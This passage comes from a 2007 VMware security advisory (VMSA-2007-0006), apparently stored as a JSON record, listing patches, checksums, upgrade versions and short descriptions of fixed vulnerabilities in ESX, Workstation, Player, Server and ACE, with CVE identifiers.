ESX-8258730 \n[www.vmware.com/support/vi3/doc/esx-8258730-patch.html](<http://www.vmware.com/support/vi3/doc/esx-8258730-patch.html>) \nmd5sum a06d0e36e403b0fe6bc6fbc76220a86d \n \nVMware ESX 3.0.0 Download Patch Bundle ESX-4809553 \n[www.vmware.com/support/vi3/doc/esx-4809553-patch.html](<http://www.vmware.com/support/vi3/doc/esx-4809553-patch.html>) \nmd5sum cd363526aab5fa6c45bf2509cb5ae500 \n \nNOTE: ESX 3.0.0 is nearing its End-of-life (10/05/2007) users \nshould upgrade to at least 3.0.1 and preferably the newest \nrelease available. \n \nVMware ESX 2.5.4 upgrade to patch 10 (Build# 53326) \nVMware ESX 2.5.3 upgrade to patch 13 (Build# 52488) \nVMware ESX 2.1.3 upgrade to patch 8 (Build# 53228) \nVMware ESX 2.0.2 upgrade to patch 8 (Build# 52650) \n \nNOTE: ESX 3.0.2 is not affected by this issue \n \nHosted products \n\\--------------- \nVMware Workstation 6.0.0 upgrade to version 6.0.1 (Build# 55017) \nVMware Workstation 5.5.4 upgrade to version 5.5.5 (Build# 56455) \nVMware Player 2.0.0 upgrade to version 2.0.1 (Build# 55017) \nVMware Player 1.0.4 upgrade to version 1.0.5 (Build# 56455) \nVMware Server 1.0.3 upgrade to version 1.0.4 (Build# 56528) \nVMware ACE 2.0.0 upgrade to version 2.0.1 (Build# 55017) \nVMware ACE 1.0.3 upgrade to version 1.0.4 (Build# 54075) \n \nII Hosted products DHCP security vulnerabilities addressed \n \nThis release fixes several vulnerabilities in the DHCP server that could enable a specially crafted packets to gain system-level privileges. (CVE-2007-0061, CVE-2007-0062, CVE-2007-0063) \n \nThanks to Neel Mehta and Ryan Smith of the IBM Internet Security Systems X-Force for discovering and researching these vulnerabilities. \n \nHosted products \n\\--------------- \nVMware Workstation 6.0.0 upgrade to version 6.0.1 (Build# 55017) \nVMware Workstation 5.5.4 upgrade to version 5.5.5 (Build# 56455) \nVMware Player 2.0.0 upgrade to version 2.0.1 (Build# 55017) \nVMware Player 1.0.4 upgrade to version 1.0.5 (Build# 56455) \nVMware Server 1.0.3 upgrade to version 1.0.4 (Build# 56528) \nVMware ACE 2.0.0 upgrade to version 2.0.1 (Build# 55017) \nVMware ACE 1.0.3 upgrade to version 1.0.4 (Build# 54075) \n \nIII Windows based hosted product vulnerability in IntraProcessLogging.dll and \nvielib.dll. \n \nThis release fixes a security vulnerability that could allow a malicious remote user to exploit the library file IntraProcessLogging.dll to overwrite files in a system. (CVE-2007-4059) \n \nThis release fixes a security vulnerability that could allow a malicious remote user to exploit the library file vielib.dll to overwrite files in a system. (CVE-2007-4155) \n \nThanks to the Goodfellas Security Research Team for discovering and researching these vulnerabilities. \n \nHosted products \n\\--------------- \nVMware Workstation 6.0.0 upgrade to version 6.0.1 (Build# 55017) \nVMware Workstation 5.5.4 upgrade to version 5.5.5 (Build# 56455) \nVMware Player 2.0.0 upgrade to version 2.0.1 (Build# 55017) \nVMware Player 1.0.4 upgrade to version 1.0.5 (Build# 56455) \nVMware Server 1.0.3 upgrade to version 1.0.4 (Build# 56528) \nVMware ACE 2.0.0 upgrade to version 2.0.1 (Build# 55017) \nVMware ACE 1.0.3 upgrade to version 1.0.4 (Build# 54075) \n \n \nIV Escalation of privileges on Windows hosted systems \n \nThis release fixes a security vulnerability in which Workstation was starting registered Windows services in an insecure manner. This vulnerability could allow a malicious user to escalate user privileges. \n \nThanks to Foundstone for discovering this vulnerability. \n \nHosted products \n\\--------------- \nVMware Workstation 6.0.0 upgrade to version 6.0.1 (Build# 55017) \nVMware Workstation 5.5.4 upgrade to version 5.5.5 (Build# 56455) \nVMware Player 2.0.0 upgrade to version 2.0.1 (Build# 55017) \nVMware Player 1.0.4 upgrade to version 1.0.5 (Build# 56455) \nVMware Server 1.0.3 upgrade to version 1.0.4 (Build# 56528) \nVMware ACE 2.0.0 upgrade to version 2.0.1 (Build# 55017) \nVMware ACE 1.0.3 upgrade to version 1.0.4 (Build# 54075) \n \nV Potential denial of service using VMware Player \n \nThis release fixes a problem that prevented VMware Player from launching. \nThis problem was accompanied by the error message VMware Player unrecoverable error: (player) Exception 0xc0000005 (access violation) has occurred. \n \nHosted products \n\\--------------- \nVMware Player 2.0.0 upgrade to version 2.0.1 (Build# 55017) \nVMware Player 1.0.4 upgrade to version 1.0.5 (Build# 56455) \n \nVI ESX Service Console updates \n\n", "modified": "2007-09-18T00:00:00", "published": "2007-09-18T00:00:00", "id": "VMSA-2007-0006", "href": "https://www.vmware.com/security/advisories/VMSA-2007-0006.html", "title": "Updated versions of all supported hosted products and all ESX 2x products and patches for ESX 30x address critical security updates. Service Console security updates for samba, bind, krb5, vixie-cron, shadow-utils, openldap, pam, gcc, and gdb packages.", "type": "vmware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}